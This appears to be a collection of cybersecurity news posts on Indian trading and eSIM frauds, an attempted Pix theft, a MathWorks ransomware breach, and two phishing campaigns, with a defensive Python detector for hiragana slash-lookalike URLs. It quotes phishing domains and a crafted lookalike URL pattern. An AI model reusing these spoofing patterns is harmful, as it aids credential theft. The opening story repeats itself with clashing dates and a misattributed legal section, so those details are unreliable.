The fraudsters allegedly built credibility with fake profit screenshots and credit entries shown inside a trading application, and used that trust to persuade her to make repeated transfers into their bank accounts. Between February and April, she invested more than Rs 3.75 crore across a number of transactions.

When she tried to withdraw what she believed to be her returns, she was informed that additional fees and taxes would be due. When she refused, everything ceased abruptly. Although an investigation has begun and investigators are working with banks to freeze accounts linked to the scam, recovery remains uncertain because the complaint was filed nearly five months after the last transfer.

The case has been filed under the Bharatiya Nyaya Sanhita as well as Section 318(4) of the Information Technology Act. Meanwhile, Sadhguru Jaggi Vasudev and the Isha Foundation formally filed a petition in June with the Delhi High Court asking the court to provide him with safeguards against misappropriation of his name and identity by deepfake content publishers.

Moreover, the Foundation issued a public advisory regarding social media platform X, warning about scams that were being perpetrated using manipulated videos and cloned voices of Sadhguru, while reaffirming that he does not and will not endorse any financial schemes or commercial products. As part of the elaborate scheme, Varsha was also added to a WhatsApp group containing almost one hundred members and invited to a Zoom tutorial on online trading.

It is suspected that the organisers of these sessions, who later turned out to be fraudsters, projected screenshots of profits and staged discussions aimed at motivating participants to act as positive leaders. Reassured by the apparent success stories and by what seemed like a legitimate platform, she transferred a total of Rs 3.75 crore in several instalments across different bank accounts.

The illusion collapsed when she attempted to withdraw her supposed earnings. The scammers made a new demand for payment of tax and processing charges, and when she refused to pay, all communication was abruptly cut off. Police officials have confirmed that her complaint was filed almost five months after the last transaction, a delay that has made it more challenging to recover the funds, even though efforts are being made to freeze the accounts involved in the scam.

Authorities also noted that the incident occurred at a time of rising concern over AI-driven fraud, with deepfake technology increasingly being used to enhance the credibility of such schemes. In April of this year, Sadhguru Jaggi Vasudev and the Isha Foundation argued that the Delhi High Court should protect them against the manipulation of their likeness and voice in deepfake videos.

In its public advisory, the Foundation told citizens that Sadhguru does not promote financial schemes or commercial products, and warned them against becoming victims of fraudulent marketing campaigns circulating on social media platforms. With artificial intelligence increasingly being used for malicious purposes, there is a growing need for greater digital literacy and vigilance.

Although law enforcement agencies continue to strengthen their cybercrime units, the first line of defence remains at the individual level. Experts suggest that citizens exercise caution when receiving unsolicited financial offers, especially those appearing on social media platforms or messaging applications. Conducting independent verification through official channels, maintaining multi-factor authentication on sensitive accounts, and not clicking impulsively on suspicious links can be highly effective in reducing exposure to such traps.

Financial institutions and banks should be equally encouraged to implement advanced artificial intelligence-based monitoring systems that can detect irregular patterns of transactions and identify fraudulent networks before they cause significant losses. Aside from technology, there must also be consistent public awareness campaigns and stricter regulations governing digital platforms that display misleading advertisements. 

It is now crucial that individuals watch for emerging threats such as deepfakes in order to protect their personal wealth and trust. As this case demonstrates, fraudsters have become sophisticated enough that protecting oneself in the digital era requires a combination of diligence, education, and more robust systemic safeguards.

Ghaziabad eSIM Fraud: Woman Loses ₹18.5 Lakh in Sophisticated SIM Swap Scam

 

A 54-year-old resident of Shipra Suncity, Indirapuram, Ghaziabad, fell victim to a sophisticated eSIM fraud that resulted in the loss of ₹18.48 lakh from her bank accounts. Arti Kaul was targeted by cybercriminals who posed as Airtel customer service representatives to execute an elaborate SIM swap scam. 

Fraudulent call 

On August 29, 2025, at approximately 1:00 PM, Kaul received a phone call from fraudsters claiming to be Airtel representatives. The callers convinced her that she needed to upgrade her SIM card from 4G to 5G as per company policy, presenting the upgrade as mandatory. Unaware of the deceptive nature of the call, Kaul stayed on the line with the fraudsters throughout the process.

Technical manipulation

At 1:10 PM, Kaul received an SMS from Airtel containing an OTP for eSIM card activation. Following this, she received a long numerical message on WhatsApp, along with subsequent SIM card update-related messages and additional calls from both the fraudsters and legitimate Airtel representatives. The victim shared the OTP with the callers, inadvertently giving them access to activate an eSIM on their own device, effectively hijacking her phone number. 

Once the fraudsters gained control of Kaul's phone number through the eSIM activation, they systematically drained her bank accounts. The theft occurred through more than 50 separate transactions between August 31 and September 1, 2025, targeting both her Axis Bank and HDFC Bank accounts. The total amount stolen reached ₹18.48 lakh. 

Discovery and legal action

Kaul discovered the fraud when her SIM card became inactive and she stopped receiving messages. Upon visiting her banks, employees informed her about the unauthorized transactions that had occurred over the previous days. She subsequently filed a complaint with the cyber crime police station, and an investigation has been launched.

This incident highlights the growing threat of eSIM-based fraud in India, where criminals exploit the convenience of digital SIM technology to rapidly hijack mobile numbers and access victims' financial accounts through intercepted OTPs. 

Safety tips 

Never share OTPs or activation codes: Avoid sharing one-time passwords (OTPs), eSIM activation codes, or QR codes with anyone, even if they claim to be from your telecom provider. No legitimate company will request these details over phone or SMS. 

Use only official channels: Always request eSIM conversions or upgrades directly through official carrier apps, websites, or physical stores. Do not click on unknown links, and never proceed with eSIM activation from unsolicited messages or calls.

Act fast on signal loss: If your phone unexpectedly loses network signal or displays “No Service,” immediately report the issue to your mobile operator and notify your bank. This could indicate that your number has been hijacked.

Stay alert for phishing attempts: Be wary of calls, emails, or texts asking for personal, banking, or SIM-related information. Always verify the identity of the sender by reaching out through the provider’s verified customer care number. 

Monitor account activity: Regularly review bank and mobile account activity for unauthorized transactions or account changes. Set up alerts where available for any transaction or SIM change activity.

Following these safety steps drastically reduces the risk of eSIM-based fraud and helps in swift detection of account compromise.

Hackers Target Brazilian Payments Provider in Attempted $130 Million Theft

 



A concerning cyber incident has shaken Brazil’s financial technology sector after criminals attempted to steal nearly $130 million through the country’s real-time payments network, Pix. The breach was detected on August 29, 2025, when Sinqia S.A., a São Paulo-based financial software company owned by Evertec, noticed unauthorized activity in its systems.


What Happened

According to Evertec’s disclosure to the U.S. Securities and Exchange Commission, attackers gained entry into Sinqia’s Pix environment and tried to initiate unauthorized business-to-business transfers. Pix, operated by the Central Bank of Brazil, is an instant payments platform that has become the country’s most widely used method for digital transfers since its launch in 2020.

The attempted theft targeted two financial institutions connected to Sinqia’s services. Once the suspicious activity was detected, Sinqia suspended all Pix-related transactions and brought in external cybersecurity experts to investigate.


How the Attackers Broke In

Initial findings show that the hackers gained access by using stolen credentials belonging to an IT service provider. By leveraging legitimate login details, they were able to penetrate Sinqia’s Pix environment and attempt large-scale transfers. This method, often referred to as a supply chain or vendor compromise, has become increasingly common in financial cyberattacks because it exploits trusted third-party relationships.

So far, Evertec has found no evidence that the breach extended beyond Sinqia’s Pix systems or that customer data was exposed.


Response and Recovery

As a precaution, the Central Bank of Brazil revoked Sinqia’s access to Pix until it can confirm the environment is secure. This suspension directly affects 24 financial institutions that rely on Sinqia to process instant transfers. The company has stated that some of the stolen funds have already been recovered, though it has not disclosed the amount. Recovery efforts are still underway, and the overall financial and reputational impact remains uncertain.

Evertec acknowledged that the consequences could be “material,” particularly in relation to customer trust and the company’s internal controls. Investigations are ongoing, and Sinqia continues to work with regulators and forensic experts to restore secure access to Pix.


Why This Matters

The case underscores the risks facing modern payment systems that operate at high speed and high volume. Pix is widely used in Brazil for everything from personal transfers to business payments, making it an attractive target for cybercriminals. By exploiting vendor credentials, attackers can bypass traditional defenses and reach critical financial infrastructure.

For banks, service providers, and regulators, the incident underscores the importance of constant vigilance, strict vendor oversight, and layered defenses against credential theft. For users, it is a reminder of both the convenience and the risks that come with instant payment systems.

Investigations are still unfolding, and more details are expected in the coming weeks as Evertec and Brazilian authorities work to close the breach and strengthen protections.



MathWorks Confirms Ransomware Incident that Exposed Personal Data of Over 10,000 People

 




MathWorks, the company behind MATLAB and Simulink, has confirmed a ransomware attack that disrupted several of its online services and internal systems. The company said the disruption affected services customers use to sign in and manage software, and that it alerted federal law enforcement while investigating the incident. 

According to state notifications filed with regulators, the attack resulted in the unauthorized access and theft of personal information for 10,476 people. These filings list the full count reported to state authorities. 


What was taken and who is affected

The company’s notices explain that the records exposed vary by person, but may include names, postal addresses, dates of birth, Social Security numbers, and in some cases non-U.S. national ID numbers. In short, the stolen files could contain information that makes victims vulnerable to identity theft. 

MathWorks’ own statements and regulatory notices put the window of unauthorized access between April 17 and May 18, 2025. The company discovered the breach on May 18 and publicly linked the outage of several services to a ransomware incident in late May. MathWorks says forensic teams contained the threat and that investigators found no ongoing activity after May 18. 


What is not yet known 

MathWorks has not identified any named ransomware group in public statements, and so far there is no verified public evidence that the stolen data has been published or sold. The company continues to monitor the situation and has offered identity protection services for those notified. 


What you can do 

If you use MathWorks products, check your account notices and follow any enrollment instructions for identity protection. Monitor financial and credit accounts, set up fraud alerts if you see suspicious activity, and change passwords for affected services. If you receive unusual messages or requests for money or personal data, treat them with suspicion and report them to your bank or local authorities.

Keep an eye on financial activity: Regularly review your bank and credit card statements to spot unauthorized transactions quickly.

Consider credit monitoring or freezes: In countries where these services are available, they can help detect or prevent new accounts being opened in your name.

Reset passwords immediately: Update the password for your MathWorks account and avoid using the same password across multiple platforms. A password manager can help create and store strong, unique passwords.

Enable multi-factor authentication: Adding a second layer of verification makes it much harder for attackers to gain access, even if they have your login details.

Stay alert for phishing attempts: Be cautious of unexpected emails, calls, or texts asking for sensitive information. Attackers may use stolen personal details to make their messages appear more convincing.



India's Biggest Cyber Fraud: Businessman Duped of ₹25 Crore Through Fake Trading App

 

A Kochi-based pharmaceutical company owner has suffered a loss of ₹25 crore in what is being described as the largest single-person cyber fraud case in India. 

The incident involved a sophisticated online trading scam, executed through a fake trading application that lured the victim with promises of lucrative returns. Despite being an experienced trader, the businessman fell prey to deception after engaging with the fraudulent app for nearly two years.

The scam unfolded over four months, during which the victim was lured by substantial profits displayed on his initial investments. These early gains convinced him of the app’s legitimacy, prompting more substantial investments.

Investigators from the Cyber Cell revealed that the app consistently showed double profits, creating an illusion of credibility and financial success. This psychological manipulation is a common tactic used by cyber fraudsters to build trust and encourage deeper engagement from unsuspecting victims. 

Trouble began when the businessman attempted to withdraw his funds, only to be met with repeated delays and a variety of excuses from the operators of the fake platform. As withdrawal requests were consistently stonewalled, suspicion grew. It was only after persistent failed attempts to access his money that the reality of the fraud became clear to the victim. 

Upon reporting the crime, swift action was taken by law enforcement. The Indian Cyber Crime Coordination Centre was immediately alerted and subsequently forwarded the information to the Thiruvananthapuram Cyber Operations Headquarters. A formal case was registered, and efforts have been initiated to freeze the remaining funds before they could be routed to additional accounts.

Investigation revealed that the fraudulent app was under the control of a foreign national, indicating possible international links and making the operation broader and more complex. The case has prompted a larger crackdown on similar cyber threats, with the Cyber Cell widening its probe to trace the perpetrators and prevent further occurrences. 

This incident highlights the growing sophistication of online financial scams in India, emphasizing the need for increased vigilance, even among experienced investors. Awareness and prompt reporting remain essential defenses against such evolving cyber threats.

Fake Netflix Job Offers Target Facebook Credentials in Real-Time Scam

 

A sophisticated phishing campaign is targeting job seekers with fake Netflix job offers designed to steal Facebook login credentials. The scam specifically focuses on marketing and social media professionals who may have access to corporate Facebook business accounts. 

Modus operandi 

The attack begins with highly convincing, AI-generated emails that appear to come from Netflix's HR team, personally tailored to recipients' professional backgrounds. When job seekers click the "Schedule Interview" link, they're directed to a fraudulent career site that closely mimics Netflix's official page. 

The fake site prompts users to create a "Career Profile" and offers options to log in with Facebook or email. However, regardless of the initial choice, victims are eventually directed to enter their Facebook credentials. This is where the scam becomes particularly dangerous. 

Real-time credential theft 

What makes this attack especially sophisticated is the use of websocket technology that allows scammers to intercept login details as they're being typed. As Malwarebytes researcher Pieter Arntz explains, "The phishers use a websocket method that allows them to intercept submissions live as they are entered. This allows them to try the credentials and if your password works, they can log into your real Facebook account within seconds". 

The attackers can immediately test stolen credentials on Facebook's actual platform and may even request multi-factor authentication codes if needed. If passwords don't work, they simply display a "wrong password" message to maintain the illusion. 

While personal Facebook accounts have value, the primary goal is accessing corporate social media accounts. Cybercriminals seek marketing managers and social media staff who control company Facebook Pages or business accounts. Once compromised, these accounts can be used to run malicious advertising campaigns at the company's expense, demand ransom payments, or leverage the organization's reputation for further scams.

Warning signs and protection

Security researchers have identified several suspicious email domains associated with this campaign, including addresses ending with @netflixworkplaceefficiencyhub.com, @netflixworkmotivation, and @netflixtalentnurture.com. The fake hiring site was identified as hiring.growwithusnetflix[.]com, though indicators suggest the operators cleared their tracks after the scam was exposed. 

Job seekers should be cautious of unsolicited job offers, verify website addresses carefully, and remember that legitimate Netflix recruitment doesn't require Facebook login credentials. The campaign demonstrates how scammers exploit both job market anxiety and the appeal of working for prestigious companies to execute sophisticated credential theft operations.

New Phishing Scam Uses Japanese Character to Perfectly Mimic Legitimate URLs

 

Cybersecurity researchers have recently flagged a highly sophisticated phishing campaign that leverages a unique tactic: the use of the Japanese hiragana character “ん” to mimic the appearance of a forward slash (“/”) in website URLs. This technique is especially effective on certain fonts and browser systems, making phony URLs appear nearly identical to legitimate ones, thus tricking even vigilant internet users. 

The campaign’s primary target is customers of the travel platform Booking.com. Instead of the real URL containing forward slashes, attackers craft addresses using the “ん” character, such as “https://account.booking[.]comんdetailんrestric-access.www-account-booking[.]comんen/”. At first glance, these URLs look authentic, but they redirect users to fraudulent domains controlled by cybercriminals.

The malicious strategy starts with phishing emails containing these deceptive links. When clicked, users are sent to sites that deliver MSI installer files, which may secretly install malware like information stealers or remote access trojans on victim devices. 

This approach is part of a broader trend known as homograph attacks. Cybercriminals exploit visual similarities between characters from different Unicode sets, using them to spoof trusted domains. Previously, attackers have used Cyrillic letters to impersonate Latin ones; the use of Japanese “ん” adds a clever new layer to these deceptions. 

According to the 2025 Phishing Trends Report, homograph attacks are evolving and becoming harder to filter out, as criminals strive to defeat security systems and bypass standard defenses. 

Safety tips 

Security experts recommend multiple protective strategies. Users should hover over links to reveal actual destination URLs, though this has limitations with sophisticated character spoofing. Modern browsers like Chrome have implemented protections against many homograph attacks, but visual URL inspection alone is insufficient. 
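Because visual inspection is unreliable here, a mail or proxy filter can examine the hostname itself. The Python below is an added example, not code from the researchers or the campaign report; the sample URLs are constructed on example domains in the same shape as the one quoted above, and the slash lookalikes other than “ん” and the two-label domain heuristic are assumptions.

```python
import unicodedata

# Characters that can render like "/" in an address bar. U+3093 is the one
# named in the article; the others are further slash lookalikes (assumption:
# this list is illustrative, not exhaustive).
SLASH_LOOKALIKES = {"\u3093", "\u2044", "\u2215", "\uff0f", "\u29f8"}


def refang(url: str) -> str:
    """Undo the '[.]' / 'hxxp' defanging commonly used in threat reports."""
    return url.replace("[.]", ".").replace("hxxp", "http", 1)


def real_host(url: str) -> str:
    """Return the host a client would actually connect to.

    Only the ASCII characters '/', '?' and '#' end the authority component,
    so a lookalike character stays inside the hostname.
    (IPv6 literals are out of scope for this example.)
    """
    rest = url.split("://", 1)[1] if "://" in url else url
    for delim in "/?#":
        rest = rest.split(delim, 1)[0]
    host = rest.rsplit("@", 1)[-1]          # drop any userinfo
    return host.split(":", 1)[0].lower()    # drop any port


def naive_domain(host: str) -> str:
    """Last two labels only; production code should use the Public Suffix List."""
    return ".".join(host.split(".")[-2:])


def analyze(url: str) -> dict:
    host = real_host(refang(url))
    hits = [(i, ch) for i, ch in enumerate(host) if ch in SLASH_LOOKALIKES]
    other = sorted({ch for ch in host
                    if ord(ch) > 127 and ch not in SLASH_LOOKALIKES})
    # What a reader believes the host is: everything before the first fake "/".
    apparent = host[:hits[0][0]] if hits else host
    try:
        ascii_host = host.encode("idna").decode("ascii")  # punycode form
    except UnicodeError:
        ascii_host = None
    return {
        "real_host": host,
        "apparent_host": apparent,
        "real_domain": naive_domain(host),
        "apparent_domain": naive_domain(apparent),
        "domain_mismatch": naive_domain(host) != naive_domain(apparent),
        "lookalikes": [f"U+{ord(ch):04X} {unicodedata.name(ch, 'UNKNOWN')}"
                       for _, ch in hits],
        "other_non_ascii": other,
        "ascii_host": ascii_host,
        "suspicious": bool(hits) or bool(other),
    }


# Constructed samples (not real indicators), defanged like a report would be.
PHISH = ("https://account.example[.]comんdetailんrestricted"
         ".www-account-example[.]net/en/")
LEGIT = "https://account.example.com/detail/restricted/en/"

if __name__ == "__main__":
    for sample in (PHISH, LEGIT):
        result = analyze(sample)
        print(sample)
        for key, value in result.items():
            print(f"  {key}: {value}")
```

Rendering the punycode (`ascii_host`) form in logs or warning banners removes the visual ambiguity, since the lookalike character can no longer pass for a path separator.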

The most effective defense combines updated security software, email filtering, and comprehensive user education about evolving attack vectors. This campaign demonstrates how cybercriminals continuously adapt their techniques to exploit even subtle visual ambiguities in digital communication systems. 

Ultimately, this new phishing campaign highlights cybercriminals’ constant creativity in exploiting even the smallest ambiguities in digital communication. As attackers continue to adapt their methods, organizations and individuals need to stay aware of these rapidly advancing attack vectors and double down on multi-layered security measures.